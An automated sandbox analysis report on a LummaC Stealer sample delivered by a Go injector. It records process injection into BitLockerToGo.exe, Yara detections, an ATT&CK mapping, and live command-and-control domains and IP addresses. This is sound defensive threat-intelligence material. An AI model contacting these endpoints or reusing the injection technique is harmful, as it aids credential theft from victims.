Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe

Static file information: File size 5181952 > 1048576

Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x210400
Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x268c00

Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000002.2621834022.000000C000534000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000002.2621834022.000000C000476000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000003.2606479076.000001FC6D590000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2619863522.000000000323D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000002.2621834022.000000C000534000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000002.2621834022.000000C000476000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000003.2606479076.000001FC6D590000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2619863522.000000000323D000.00000004.00000020.00020000.00000000.sdmp

Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe

Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 6764

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: BitLockerToGo.exe, 00000004.00000003.2630757931.000000000328B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWE
Source: BitLockerToGo.exe, 00000004.00000003.2630757931.000000000328B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2658742837.000000000328B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2655980514.000000000328B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2658639500.000000000323B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2630820171.000000000328B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000002.2622238549.000001FC68088000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllhhM
Source: BitLockerToGo.exe, 00000004.00000003.2630820171.000000000328B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWC

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

API call chain: ExitProcess graph end node

graph_4-10703

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 4_2_02FD2610 LdrInitializeThunk,

4_2_02FD2610

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2FA0000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2FA0000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000003.2619684127.000001FC6D540000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: weiggheticulop.shop
Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000003.2619684127.000001FC6D540000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: consciousourwi.shop
Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000003.2619684127.000001FC6D540000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: southedhiscuso.shop
Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000003.2619684127.000001FC6D540000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: deicedosmzj.shop
Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000003.2619684127.000001FC6D540000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: cagedwifedsozm.shop
Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000003.2619684127.000001FC6D540000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: charecteristicdxp.shop
Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000003.2619684127.000001FC6D540000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: interactiedovspm.shop
Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000003.2619684127.000001FC6D540000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: potentioallykeos.shop
Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000003.2619684127.000001FC6D540000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: drinnkysoapmzv.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2FA0000			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 31E5008			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe

Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Go Injector

Source: Yara match	File source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, type: SAMPLE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.7ff698a90000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.7ff698a90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2622890654.00007FF698CEA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2030347840.00007FF698CEA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe PID: 6220, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.c000304000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.1fc6d590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.BitLockerToGo.exe.2fa0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.c0001ba000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.BitLockerToGo.exe.2fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.1fc6d540000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.1fc6d590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.1fc6d540000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.c000304000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.c0001ba000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2619684127.000001FC6D540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2583891127.000001FC6D590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2621055667.000000C0001BA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2621834022.000000C000400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2621055667.000000C000346000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2621055667.000000C000304000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2621055667.000000C000280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Go Injector

Source: Yara match	File source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, type: SAMPLE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.7ff698a90000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.7ff698a90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2622890654.00007FF698CEA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2030347840.00007FF698CEA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe PID: 6220, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.c000304000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.1fc6d590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.BitLockerToGo.exe.2fa0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.c0001ba000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.BitLockerToGo.exe.2fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.1fc6d540000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.1fc6d590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.1fc6d540000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.c000304000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe.c0001ba000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2619684127.000001FC6D540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2583891127.000001FC6D590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2621055667.000000C0001BA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2621834022.000000C000400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2621055667.000000C000346000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2621055667.000000C000304000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2621055667.000000C000280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	311 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	311 Process Injection	Security Account Manager	12 System Information Discovery	SMB/Windows Admin Shares	2 Clipboard Data	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	61%	ReversingLabs	Win32.Trojan.Generic
SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	68%	Virustotal		Browse
SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
interactiedovspm.shop	21%	Virustotal	Browse
charecteristicdxp.shop	21%	Virustotal	Browse
drinnkysoapmzv.shop	20%	Virustotal	Browse
potentioallykeos.shop	21%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://interactiedovspm.shop/T	100%	Avira URL Cloud	malware
https://potentioallykeos.shop/h	100%	Avira URL Cloud	malware
weiggheticulop.shop	100%	Avira URL Cloud	malware
https://www.cloudflare.com/learning/access-management/phishing-attack/	0%	Avira URL Cloud	safe
https://drinnkysoapmzv.shop/p	100%	Avira URL Cloud	phishing
deicedosmzj.shop	100%	Avira URL Cloud	malware
cagedwifedsozm.shop	100%	Avira URL Cloud	malware
https://potentioallykeos.shop/api)	100%	Avira URL Cloud	malware
https://potentioallykeos.shop/h	11%	Virustotal		Browse
weiggheticulop.shop	20%	Virustotal		Browse
consciousourwi.shop	100%	Avira URL Cloud	malware
potentioallykeos.shop	100%	Avira URL Cloud	malware
cagedwifedsozm.shop	22%	Virustotal		Browse
https://potentioallykeos.shop/api	100%	Avira URL Cloud	malware
deicedosmzj.shop	22%	Virustotal		Browse
https://www.cloudflare.com/learning/access-management/phishing-attack/	0%	Virustotal		Browse
https://interactiedovspm.shop/api	100%	Avira URL Cloud	malware
consciousourwi.shop	22%	Virustotal		Browse
https://potentioallykeos.shop/	100%	Avira URL Cloud	malware
https://drinnkysoapmzv.shop/api	100%	Avira URL Cloud	phishing
southedhiscuso.shop	100%	Avira URL Cloud	malware
https://interactiedovspm.shop/api	22%	Virustotal		Browse
interactiedovspm.shop	100%	Avira URL Cloud	malware
potentioallykeos.shop	21%	Virustotal		Browse
https://drinnkysoapmzv.shop/api	16%	Virustotal		Browse
https://potentioallykeos.shop/api	22%	Virustotal		Browse
https://interactiedovspm.shop/	100%	Avira URL Cloud	malware
https://drinnkysoapmzv.shop/	100%	Avira URL Cloud	phishing
https://github.com/quic-go/quic-go/wiki/Logging11579208921035624876269744694940757353008614341529031	0%	Avira URL Cloud	safe
interactiedovspm.shop	21%	Virustotal		Browse
southedhiscuso.shop	21%	Virustotal		Browse
drinnkysoapmzv.shop	100%	Avira URL Cloud	phishing
https://potentioallykeos.shop/api9	100%	Avira URL Cloud	malware
https://www.cloudflare.com/5xx-error-landing	0%	Avira URL Cloud	safe
drinnkysoapmzv.shop	20%	Virustotal		Browse
https://drinnkysoapmzv.shop/	17%	Virustotal		Browse
https://interactiedovspm.shop/	21%	Virustotal		Browse
https://github.com/quic-go/quic-go/wiki/Logging11579208921035624876269744694940757353008614341529031	0%	Virustotal		Browse
https://potentioallykeos.shop/	20%	Virustotal		Browse
https://www.cloudflare.com/5xx-error-landing	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
interactiedovspm.shop	172.67.161.217	true	true	21%, Virustotal, Browse	unknown
charecteristicdxp.shop	104.21.84.50	true	true	21%, Virustotal, Browse	unknown
drinnkysoapmzv.shop	172.67.174.127	true	true	20%, Virustotal, Browse	unknown
potentioallykeos.shop	unknown	unknown	true	21%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
weiggheticulop.shop	true	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
deicedosmzj.shop	true	22%, Virustotal, Browse Avira URL Cloud: malware	unknown
cagedwifedsozm.shop	true	22%, Virustotal, Browse Avira URL Cloud: malware	unknown
consciousourwi.shop	true	22%, Virustotal, Browse Avira URL Cloud: malware	unknown
potentioallykeos.shop	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://interactiedovspm.shop/api	true	22%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://drinnkysoapmzv.shop/api	true	16%, Virustotal, Browse Avira URL Cloud: phishing	unknown
southedhiscuso.shop	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
interactiedovspm.shop	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
drinnkysoapmzv.shop	true	20%, Virustotal, Browse Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	BitLockerToGo.exe, 00000004.00000003.2656060688.000000000324F000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://interactiedovspm.shop/T	BitLockerToGo.exe, 00000004.00000002.2658742837.000000000328B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2655980514.000000000328B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://drinnkysoapmzv.shop/p	BitLockerToGo.exe, 00000004.00000002.2658639500.000000000323B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://potentioallykeos.shop/h	BitLockerToGo.exe, 00000004.00000003.2630820171.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2630757931.0000000003299000.00000004.00000020.00020000.00000000.sdmp	false	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://potentioallykeos.shop/api)	BitLockerToGo.exe, 00000004.00000003.2630820171.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2630757931.0000000003299000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://potentioallykeos.shop/api	BitLockerToGo.exe, 00000004.00000003.2630820171.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2630757931.0000000003299000.00000004.00000020.00020000.00000000.sdmp	false	22%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://potentioallykeos.shop/	BitLockerToGo.exe, 00000004.00000002.2658742837.000000000328B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2630820171.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2630757931.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2655980514.000000000328B000.00000004.00000020.00020000.00000000.sdmp	false	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://interactiedovspm.shop/	BitLockerToGo.exe, 00000004.00000002.2658742837.000000000328B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2655980514.000000000328B000.00000004.00000020.00020000.00000000.sdmp	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://drinnkysoapmzv.shop/	BitLockerToGo.exe, 00000004.00000003.2630757931.000000000326D000.00000004.00000020.00020000.00000000.sdmp	false	17%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://github.com/quic-go/quic-go/wiki/Logging11579208921035624876269744694940757353008614341529031	SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://potentioallykeos.shop/api9	BitLockerToGo.exe, 00000004.00000003.2630757931.0000000003299000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.cloudflare.com/5xx-error-landing	BitLockerToGo.exe, 00000004.00000003.2656060688.000000000324F000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.161.217	interactiedovspm.shop	United States	13335	CLOUDFLARENETUS	true
172.67.174.127	drinnkysoapmzv.shop	United States	13335	CLOUDFLARENETUS	true
104.21.84.50	charecteristicdxp.shop	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1502490
Start date and time:	2024-09-01 22:23:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@4/0@4/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, PID 6220 because there are no executed function
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:24:55	API Interceptor	1x Sleep call for process: BitLockerToGo.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
172.67.161.217	qbvytVOPN0.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	SecuriteInfo.com.Trojan.InjectNET.17.28316.12072.exe	Get hash	malicious	LummaC	Browse
	Main.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse
	SecuriteInfo.com.Win64.Malware-gen.11552.16589.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse
	3YnUgeDEZz.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	SecuriteInfo.com.W64.Agent.VY.tr.12188.8697.exe	Get hash	malicious	LummaC, Go Injector	Browse
